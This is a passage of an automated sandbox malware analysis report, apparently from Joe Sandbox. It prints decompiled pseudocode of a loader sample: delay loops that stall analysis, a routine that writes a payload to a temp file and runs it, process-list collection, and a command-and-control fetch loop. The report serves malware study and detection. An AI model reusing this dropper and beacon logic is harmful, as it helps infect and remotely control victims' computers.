0x0138983a
0x01389840
0x01389853
0x01389857
0x0138985c
0x0138985d
0x0138985f
0x01389861
0x01389863
0x0138986c
0x0138988b
0x0138988f
0x0138989c
0x013898a2
0x013898a7
0x013898b2
0x013898b2
0x013898a7
0x0138988f
0x013898b9
0x013898b9
0x013898bf
0x013898c2
0x013898c9
0x013898cc
0x00000000
0x00000000
0x00000000
0x013898cc
0x013898d2
0x013898d2
0x013898e1
0x013898eb
0x013898f1
0x01389901
0x01389901
0x013898eb
0x013897f2
0x01389787
0x01389795
0x01389795
0x01389909
0x01389910
0x01389917
0x01389917
0x0138991e
0x0138992f
0x0138992f
0x01389750
0x01389737
0x01389646
0x01389646
0x01389646

APIs

lstrcmpiW.KERNEL32(0138C9C8,0138C7C0), ref: 01389636
memset.NTDLL ref: 0138965A
memset.NTDLL ref: 0138966B
GetTempPathW.KERNEL32(00000104,?), ref: 013896B5
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 013896C7

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Tempmemset$FileNamePathlstrcmpi
String ID:
API String ID: 2872760765-0
Opcode ID: c6448fd41858f125339626758d18e3c16f772bb2a0c5c312d1046456115e641a
Instruction ID: 94ef70f7265ad30db4daead9f7af627c6166f9cc282db463fb739f1fb84352e2
Opcode Fuzzy Hash: c6448fd41858f125339626758d18e3c16f772bb2a0c5c312d1046456115e641a
Instruction Fuzzy Hash: 82A16E71A40309BFEB31AFA4EC89FEE7B7CAB44B49F141015F605F6180D77499458B64

Uniqueness

Uniqueness Score: -1.00%

Function 01389A90, Relevance: 25.6, APIs: 17, Instructions: 139
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E01389A90(void* __ecx, long __edx) {
				long _v8;
				void* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v100;
				char _v228;
				short _v748;
				signed int _t28;
				int _t46;
				void* _t52;
				void* _t59;
				void* _t60;
				short _t61;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_v8 = __edx;
				_t52 = __ecx;
				memset( &_v100, 0, 0x44);
				memset( &_v28, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 0x80;
				_t61 = 0;
				do {
					if(_t61 < 0xfa00) {
						GetLastError();
					}
					_t61 = _t61 + 1;
				} while (_t61 < 0x8000000);
				_t28 = GetTickCount();
				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
				E01382240( &_v228, _t7);
				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
				E01381830(0x1381370, 0xc, 0x7d1cc189,  &_v12);
				_t64 = _v12;
				 *0x138c200( &_v748, 0x104, _t64, 0x138c5b8,  &_v228);
				HeapFree(GetProcessHeap(), 0, _t64);
				_t65 = 0;
				do {
					if(_t65 < 0xfa00) {
						GetLastError();
					}
					_t65 = _t65 + 1;
				} while (_t65 < 0x8000000);
				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
				_t66 = 0;
				do {
					if(_t66 < 0xfa00) {
						GetLastError();
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x8000000);
				if(_t59 != 0xffffffff) {
					WriteFile(_t59, _t52, _v8,  &_v8, 0);
					CloseHandle(_t59);
				}
				_t60 = 0;
				do {
					_t67 = 0;
					do {
						if(_t67 < 0xfa00) {
							GetLastError();
						}
						_t67 = _t67 + 1;
					} while (_t67 < 0x8000000);
					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
					if(_t46 != 0) {
						CloseHandle(_v28);
						return CloseHandle(_v28.hThread);
					} else {
						goto L20;
					}
					L23:
					L20:
					_t60 = _t60 + 1;
					Sleep(0xc8);
				} while (_t60 < 0x10);
				return _t46;
				goto L23;
			}

0x01389aa1
0x01389aa7
0x01389aa9
0x01389ab7
0x01389ac0
0x01389ac7
0x01389ace
0x01389ad0
0x01389ad6
0x01389ad8
0x01389ad8
0x01389ade
0x01389adf
0x01389ae7
0x01389af8
0x01389afb
0x01389b07
0x01389b1d
0x01389b22
0x01389b3e
0x01389b51
0x01389b57
0x01389b60
0x01389b66
0x01389b68
0x01389b68
0x01389b6e
0x01389b6f
0x01389b96
0x01389b98
0x01389ba0
0x01389ba6
0x01389ba8
0x01389ba8
0x01389bae
0x01389baf
0x01389bba
0x01389bc7
0x01389bce
0x01389bce
0x01389bd4
0x01389bd6
0x01389bd6
0x01389bd8
0x01389bde
0x01389be0
0x01389be0
0x01389be6
0x01389be7
0x01389c0c
0x01389c14
0x01389c31
0x01389c46
0x00000000
0x00000000
0x00000000
0x00000000
0x01389c16
0x01389c1b
0x01389c1c
0x01389c22
0x01389c2d
0x00000000

APIs

memset.NTDLL ref: 01389AA9
memset.NTDLL ref: 01389AB7
GetLastError.KERNEL32 ref: 01389AD8
GetTickCount.KERNEL32 ref: 01389AE7
_snwprintf.NTDLL ref: 01389B3E
GetProcessHeap.KERNEL32(00000000,?), ref: 01389B4A
HeapFree.KERNEL32(00000000), ref: 01389B51
GetLastError.KERNEL32 ref: 01389B68
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01389B90
GetLastError.KERNEL32 ref: 01389BA8
WriteFile.KERNEL32(00000000,?,01388F6C,01388F6C,00000000), ref: 01389BC7
CloseHandle.KERNEL32(00000000), ref: 01389BCE
GetLastError.KERNEL32 ref: 01389BE0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 01389C0C
Sleep.KERNEL32(000000C8), ref: 01389C1C

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
String ID:
API String ID: 2430354324-0
Opcode ID: 94c9858fe7807e3cf6766bb418586e7017deb49aeec0a9553ae711c30f2d8d3f
Instruction ID: 5d8421b309e7356d50f9975e704c4059ceb46c220cd43bcf5805cbb2f5120c1d
Opcode Fuzzy Hash: 94c9858fe7807e3cf6766bb418586e7017deb49aeec0a9553ae711c30f2d8d3f
Instruction Fuzzy Hash: 7441C772940314ABEB21ABA4EC8DFEDBB7DEB44315F400161FA0AE7584CB3059858BB5

Uniqueness

Uniqueness Score: -1.00%

Function 01388520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E01388520(void* _a4, long* _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v32;
				void* _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v188;
				void* _t42;
				signed char* _t62;
				void* _t64;
				void _t79;
				long _t82;
				long* _t83;
				signed char* _t88;
				void* _t92;
				long* _t103;
				void* _t104;
				void* _t105;

				_v32 = 0x10;
				_t42 = E01388420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
				_t103 = _a8;
				_v28 = _t42;
				_t83 =  &(_t103[1]);
				 *_t83 = 0;
				 *_t103 = 0;
				if(_t42 != 0) {
					if(E01388700( &_v40,  &_v32) != 0) {
						if(E013823F0( &_v40,  &_v12) != 0) {
							E01381830(0x138c020, 0xc, 0x58619fa4,  &_a4);
							_t88 =  *0x138c298; // 0x0
							_t104 = _a4;
							 *0x138c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
							HeapFree(GetProcessHeap(), 0, _t104);
							_t62 =  *0x138c298; // 0x0
							_push(_t88);
							_t64 = E01381C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
							_t105 = _v12;
							if(_t64 != 0) {
								_push(_v8);
								_push(_t105);
								if(E01381D40( &_v60) != 0) {
									if(E01381E50( &_v60,  &_v12,  &_v8) != 0) {
										if(E01382530( &_v12,  &_v20) != 0) {
											_t92 = _v20;
											_t79 =  *_t92;
											 *_t83 = _t79;
											if(_t79 < 0x4000000) {
												_t82 = E013884C0(_t92 + 4, _v16 - 4, _t83);
												_t92 = _v20;
												 *_t103 = _t82;
											}
											HeapFree(GetProcessHeap(), 0, _t92);
										}
										HeapFree(GetProcessHeap(), 0, _v12);
									}
									 *0x138c234(_v52);
								}
								 *0x138c234(_v56);
								 *0x138c234(_v60);
							}
							HeapFree(GetProcessHeap(), 0, 0);
							HeapFree(GetProcessHeap(), 0, _t105);
						}
						HeapFree(GetProcessHeap(), 0, _v40);
					}
					HeapFree(GetProcessHeap(), 0, _v28);
				}
				return 0 |  *_t103 != 0x00000000;
			}

0x01388538
0x0138853f
0x01388544
0x0138854a
0x0138854d
0x01388550
0x01388556
0x0138855e
0x01388571
0x01388588
0x013885a1
0x013885a6
0x013885ac
0x013885cc
0x013885df
0x013885e5
0x013885f0
0x013885f9
0x013885fe
0x01388606
0x0138860c
0x01388612
0x01388620
0x01388636
0x01388649
0x0138864b
0x0138864e
0x01388650
0x01388657
0x01388663
0x01388668
0x0138866e
0x0138866e
0x0138867a
0x0138867a
0x0138868c
0x0138868c
0x01388695
0x01388695
0x0138869e
0x013886a7
0x013886a7
0x013886b8
0x013886c8
0x013886c8
0x013886da
0x013886da
0x013886ec
0x013886ec
0x013886ff

APIs

Part of subcall function 01388420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 01388468
Part of subcall function 01388420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0138846F
Part of subcall function 01388420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 01388493
Part of subcall function 01388420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0138849A

Part of subcall function 01388700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,0138856F), ref: 01388746
Part of subcall function 01388700: RtlAllocateHeap.NTDLL(00000000), ref: 0138874D
Part of subcall function 01388700: memcpy.NTDLL(00000000,?,?), ref: 013887A9

_snwprintf.NTDLL ref: 013885CC
GetProcessHeap.KERNEL32(00000000,?), ref: 013885D8
HeapFree.KERNEL32(00000000), ref: 013885DF

Part of subcall function 01381C50: memset.NTDLL ref: 01381C70
Part of subcall function 01381C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381C9C
Part of subcall function 01381C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 01381CAE
Part of subcall function 01381C50: RtlAllocateHeap.NTDLL(00000000), ref: 01381CB5
Part of subcall function 01381C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01381CD0
Part of subcall function 01381C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381CED
Part of subcall function 01381C50: HeapFree.KERNEL32(00000000), ref: 01381CF4

GetProcessHeap.KERNEL32(00000000,?), ref: 01388673
HeapFree.KERNEL32(00000000), ref: 0138867A

Part of subcall function 013884C0: GetProcessHeap.KERNEL32(00000000,01388668,?,?,?,01388668,?), ref: 013884D5
Part of subcall function 013884C0: RtlAllocateHeap.NTDLL(00000000), ref: 013884DC
Part of subcall function 013884C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 013884FF
Part of subcall function 013884C0: HeapFree.KERNEL32(00000000), ref: 01388506

GetProcessHeap.KERNEL32(00000000,?), ref: 01388685
HeapFree.KERNEL32(00000000), ref: 0138868C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 013886B1
HeapFree.KERNEL32(00000000), ref: 013886B8
GetProcessHeap.KERNEL32(00000000,?), ref: 013886C1
HeapFree.KERNEL32(00000000), ref: 013886C8

Part of subcall function 01381D40: GetProcessHeap.KERNEL32(00000000,00000000,?,0138861B), ref: 01381DA2
Part of subcall function 01381D40: HeapFree.KERNEL32(00000000,?,0138861B), ref: 01381DA9

Part of subcall function 01381E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,01388631), ref: 01381E89
Part of subcall function 01381E50: RtlAllocateHeap.NTDLL(00000000), ref: 01381E90
Part of subcall function 01381E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 01381EFB
Part of subcall function 01381E50: HeapFree.KERNEL32(00000000), ref: 01381F02

GetProcessHeap.KERNEL32(00000000,?), ref: 013886D3
HeapFree.KERNEL32(00000000), ref: 013886DA

Part of subcall function 01381830: GetProcessHeap.KERNEL32(00000008,01389F6B,00000000,00000000,01381004,?,013815F4,4DBAC13F,01389F6B,?,00000000), ref: 01381844
Part of subcall function 01381830: RtlAllocateHeap.NTDLL(00000000,?,013815F4), ref: 0138184B

GetProcessHeap.KERNEL32(00000000,?), ref: 013886E5
HeapFree.KERNEL32(00000000), ref: 013886EC

Part of subcall function 013823F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 01382422
Part of subcall function 013823F0: RtlAllocateHeap.NTDLL(00000000), ref: 01382429
Part of subcall function 013823F0: memcpy.NTDLL(01388583,?,?), ref: 01382467
Part of subcall function 013823F0: GetProcessHeap.KERNEL32(00000000,01388583), ref: 0138250A
Part of subcall function 013823F0: HeapFree.KERNEL32(00000000), ref: 01382511

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocate$ByteCharMultiWidememcpy$_snwprintfmemset
String ID:
API String ID: 876682111-0
Opcode ID: 5b3ad27230d632216a19bfec4af72c17ac12de9a796cc36c84571fa4a047e613
Instruction ID: cda4ff398b461d208e4216b19f9032d147bad65100dcb809f5f890e4b0dbd3bf
Opcode Fuzzy Hash: 5b3ad27230d632216a19bfec4af72c17ac12de9a796cc36c84571fa4a047e613
Instruction Fuzzy Hash: 70513B72900305AFEF10ABE4EC49BEEBB7DAF08309F144450F609D6194EB319A55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01388DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E01388DD0(void* __edx) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount();
				if(_t28 <  *0x138c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x138c280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M01389044))) {
							case 0:
								 *0x138c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x138c280 = 0;
								__eax = E01389620(__ecx, __edx);
								__eax = __eax;
								if(__eax == 0) {
									 *0x138c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x138c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x138c280 = 0;
								 *0x138c294 = 0x1381270;
								 *0x138c298 = 0x1381270;
								__eax = E013822E0();
								__eax =  *0x138c02c; // 0x13812f8
								 *0x138c26c = __eax;
								__eax =  *0x138c030; // 0x6a
								 *0x138c268 = 0x138c2a8;
								 *0x138c270 = __eax;
								 *0x138c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x138c280 = 0;
								__eax = E01388BB0( &_v28);
								__ecx =  &_v36;
								__eax = E01388D50( &_v36);
								__eax =  *0x138cbd0; // 0x0
								_push(0x138c2a8);
								_v32 = __eax;
								_v44 = 0x138c2a8;
								_v44 =  *0x138c1e4();
								__eax =  *0x138c2a4; // 0x0
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = E01388920( &_v24);
									__ecx =  &_v16;
									__eax = E0138A7A0( &_v16);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(E01389F80( &_v84,  &_v52) != 0) {
										 &_v92 =  &_v84;
										if(E01388520( &_v84,  &_v92) == 0) {
											__eax =  *0x138c298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x138c298 = __eax;
											 *0x138c298 = __eax;
										} else {
											__eax = E013899A0();
											__ecx = 0;
											__eax = E013888B0(0);
											__ecx = 0;
											__eax = E0138A750(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(E0138A180( &_v92,  &_v76) != 0) {
												__eax = E01381750();
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = E01389A90(_v76, __edx);
												}
												__eax = E01381750();
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = E01388990(_v68, __edx);
													__esi = 0;
												}
												__eax = E01381750();
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = E0138A810(_v60, __edx);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x138c280 = 4;
								 *0x138c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x01388dda
0x01388de6
0x0138903d
0x01389041
0x01388dec
0x01388dec
0x01388df1
0x01388df5
0x00000000
0x01388dfb
0x01388dfb
0x00000000
0x01388e02
0x01388e10
0x00000000
0x00000000
0x01388e13
0x01388e1d
0x01388e22
0x01388e25
0x01388e41
0x01388e4b
0x01388e4f
0x01388e27
0x01388e28
0x00000000
0x01388e2e
0x01388e34
0x01388e3a
0x01388e3e
0x01388e3e
0x01388e28
0x00000000
0x00000000
0x01388e52
0x01388e5c
0x01388e66
0x01388e70
0x01388e75
0x01388e7a
0x01388e7f
0x01388e84
0x01388e8e
0x01388e93
0x01388e9d
0x01388ea1
0x00000000
0x00000000
0x01388ea4
0x01388ea8
0x01388eb2
0x01388eb7
0x01388ebb
0x01388ec0
0x01388ec5
0x01388eca
0x01388ece
0x01388edc
0x01388ee0
0x01388ee8
0x01388ef0
0x01388ef0
0x01388ef4
0x01388ef9
0x01388efe
0x01388f02
0x01388f07
0x01388f0b
0x01388f16
0x01388f21
0x01388f30
0x01388fb1
0x01388fb6
0x01388fbb
0x01388fbe
0x01388fcd
0x01388f32
0x01388f32
0x01388f37
0x01388f39
0x01388f3e
0x01388f40
0x01388f45
0x01388f49
0x01388f54
0x01388f56
0x01388f5b
0x01388f61
0x01388f63
0x01388f67
0x01388f67
0x01388f6c
0x01388f71
0x01388f77
0x01388f79
0x01388f7d
0x01388f82
0x01388f82
0x01388f84
0x01388f89
0x01388f8f
0x01388f91
0x01388f95
0x01388f9a
0x01388f9a
0x01388f8f
0x01388fa9
0x01388fa9
0x01388fdf
0x01388fdf
0x01388ff2
0x01389005
0x0138900b
0x01389013
0x0138901d
0x0138901f
0x0138902b
0x01389037
0x00000000
0x00000000
0x01388dfb
0x01388df5
0x00000000

APIs

GetTickCount.KERNEL32 ref: 01388DDA
SetEvent.KERNEL32 ref: 01388E34
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0138C2A8), ref: 01388ED6
GetProcessHeap.KERNEL32(00000000,?), ref: 01388FA2
HeapFree.KERNEL32(00000000), ref: 01388FA9
GetProcessHeap.KERNEL32(00000000,?), ref: 01388FD8
HeapFree.KERNEL32(00000000), ref: 01388FDF
GetProcessHeap.KERNEL32(00000000,?), ref: 01388FEB
HeapFree.KERNEL32(00000000), ref: 01388FF2
GetProcessHeap.KERNEL32(00000000,?), ref: 01388FFE
HeapFree.KERNEL32(00000000), ref: 01389005
GetTickCount.KERNEL32 ref: 01389013
GetProcessHeap.KERNEL32(00000000,?), ref: 01389030
HeapFree.KERNEL32(00000000), ref: 01389037

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$CountTick$Eventlstrlen
String ID:
API String ID: 1747682351-0
Opcode ID: a050a7ca3c2160777087be1f30ac19362c071eab03ae79cc88ea413f3747263c
Instruction ID: 4bffe60d9682e9ca24144cc58acdcbe8fc71abb1746181c0cca7e053e46872bd
Opcode Fuzzy Hash: a050a7ca3c2160777087be1f30ac19362c071eab03ae79cc88ea413f3747263c
Instruction Fuzzy Hash: C8519F725043019FEB20FFA8F885BDEBBA9FB94318F441559F64987688DB319508CB72

Uniqueness

Uniqueness Score: -1.00%

Function 01388BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01388BB0(char** __ecx) {
				short* _v8;
				long _v12;
				char** _v16;
				int* _v20;
				short _v540;
				char** _t39;
				short* _t49;
				int* _t61;
				int _t71;
				int _t73;
				signed int _t74;
				short* _t75;
				intOrPtr* _t80;
				long _t82;
				int _t83;
				char** _t84;
				WCHAR* _t86;
				char* _t87;

				_v12 = 0;
				_t73 = 0;
				_v16 = __ecx;
				 *__ecx = 0;
				_t39 =  &(__ecx[1]);
				_v20 = _t39;
				_v8 = 0;
				 *_t39 = 0;
				GetModuleFileNameW(0,  &_v540, 0x104);
				_t86 =  &(( &_v540)[lstrlenW( &_v540)]);
				if(_t86 >  &_v540) {
					while( *_t86 != 0x5c) {
						_t86 = _t86 - 2;
						if(_t86 >  &_v540) {
							continue;
						} else {
						}
						goto L6;
					}
					_t86 =  &(_t86[1]);
				}
				L6:
				E01382110( &_v12);
				_t80 = _v12;
				if(_t80 != 0) {
					_t75 = 0;
					do {
						_t14 = _t80 + 4; // 0x4
						_t71 = lstrlenW(_t14);
						_t80 =  *_t80;
						_t75 = _t75 + 1 + _t71;
					} while (_t80 != 0);
					_v8 = _t75;
					_t73 = 0;
				}
				_t49 = RtlAllocateHeap(GetProcessHeap(), 8, _v8 + _v8);
				_v8 = _t49;
				if(_t49 == 0) {
					return 0 |  *_v16 != 0x00000000;
				} else {
					_t82 = _v12;
					while(_t82 != 0) {
						_t19 = _t82 + 4; // 0x4
						if(lstrcmpiW(_t19, _t86) == 0) {
							_t49 = _v8;
						} else {
							_t20 = _t82 + 4; // 0x4
							lstrcpyW( &(_v8[_t73]), _t20);
							_t24 = _t82 + 4; // 0x4
							_t74 = _t73 + lstrlenW(_t24);
							_t49 = _v8;
							_t49[_t74] = 0x2c;
							_t73 = _t74 + 1;
						}
						_t82 =  *_t82;
					}
					_t87 = 0;
					_t83 = WideCharToMultiByte(0xfde9, 0, _t49, _t73, 0, 0, 0, 0);
					if(_t83 != 0) {
						_t87 = RtlAllocateHeap(GetProcessHeap(), 8, _t83);
						if(_t87 != 0) {
							WideCharToMultiByte(0xfde9, 0, _v8, _t73, _t87, _t83, 0, 0);
							_t61 = _v20;
							if(_t61 != 0) {
								 *_t61 = _t83;
							}
						}
					}
					_t84 = _v16;
					 *_t84 = _t87;
					HeapFree(GetProcessHeap(), 0, _v8);
					return 0 |  *_t84 != 0x00000000;
				}
			}

0x01388bbc
0x01388bc3
0x01388bc5
0x01388bca
0x01388bcc
0x01388bcf
0x01388bd7
0x01388bde
0x01388be8
0x01388c01
0x01388c0c
0x01388c10
0x01388c16
0x01388c21
0x00000000
0x00000000
0x01388c23
0x00000000
0x01388c21
0x01388c25
0x01388c25
0x01388c28
0x01388c2b
0x01388c30
0x01388c35
0x01388c37
0x01388c40
0x01388c40
0x01388c44
0x01388c4a
0x01388c4d
0x01388c4f
0x01388c53
0x01388c56
0x01388c56
0x01388c67
0x01388c6d
0x01388c72
0x01388d4a
0x01388c78
0x01388c78
0x01388c7d
0x01388c80
0x01388c8d
0x01388cbb
0x01388c8f
0x01388c8f
0x01388c9a
0x01388ca0
0x01388caa
0x01388cb1
0x01388cb4
0x01388cb8
0x01388cb8
0x01388cbe
0x01388cc0
0x01388cc4
0x01388cd8
0x01388cdc
0x01388cee
0x01388cf2
0x01388d06
0x01388d0c
0x01388d11
0x01388d13
0x01388d13
0x01388d11
0x01388cf2
0x01388d15
0x01388d1d
0x01388d26
0x01388d39
0x01388d39

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01388BE8
lstrlenW.KERNEL32(?), ref: 01388BF5
lstrlenW.KERNEL32(00000004), ref: 01388C44
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01388C60
RtlAllocateHeap.NTDLL(00000000), ref: 01388C67
lstrcmpiW.KERNEL32(00000004,?), ref: 01388C85
lstrcpyW.KERNEL32(00000000,00000004), ref: 01388C9A
lstrlenW.KERNEL32(00000004), ref: 01388CA4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01388CD2
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01388CE1
RtlAllocateHeap.NTDLL(00000000), ref: 01388CE8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01388D06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01388D1F
HeapFree.KERNEL32(00000000), ref: 01388D26

Memory Dump Source

Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true

Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd

Yara matches

Similarity

API ID: Heap$Processlstrlen$AllocateByteCharMultiWide$FileFreeModuleNamelstrcmpilstrcpy
String ID:
API String ID: 2501218360-0
Opcode ID: 5990181959667f700861dc8d5b770440a4639293a271f737d5befc555612c536
Instruction ID: a84819746f9f3746f7cd6186f05a43cd6cbdb2256f163a6ce78217867bff20a8
Opcode Fuzzy Hash: 5990181959667f700861dc8d5b770440a4639293a271f737d5befc555612c536
Instruction Fuzzy Hash: 5551A176940319AFEB209FA9DC88ADEFBBCFF44714F5504A4E904D7244EB309A45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0138A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0138A690(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, E0138A3A0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
